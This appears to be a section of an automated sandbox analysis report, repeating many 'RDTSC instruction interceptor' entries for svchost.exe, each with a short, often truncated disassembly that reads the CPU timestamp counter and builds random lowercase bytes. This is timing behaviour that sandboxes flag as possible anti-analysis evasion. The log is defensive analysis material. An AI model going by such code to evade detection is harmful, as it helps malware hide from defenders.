Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59150h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59130h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7D6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FBB6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
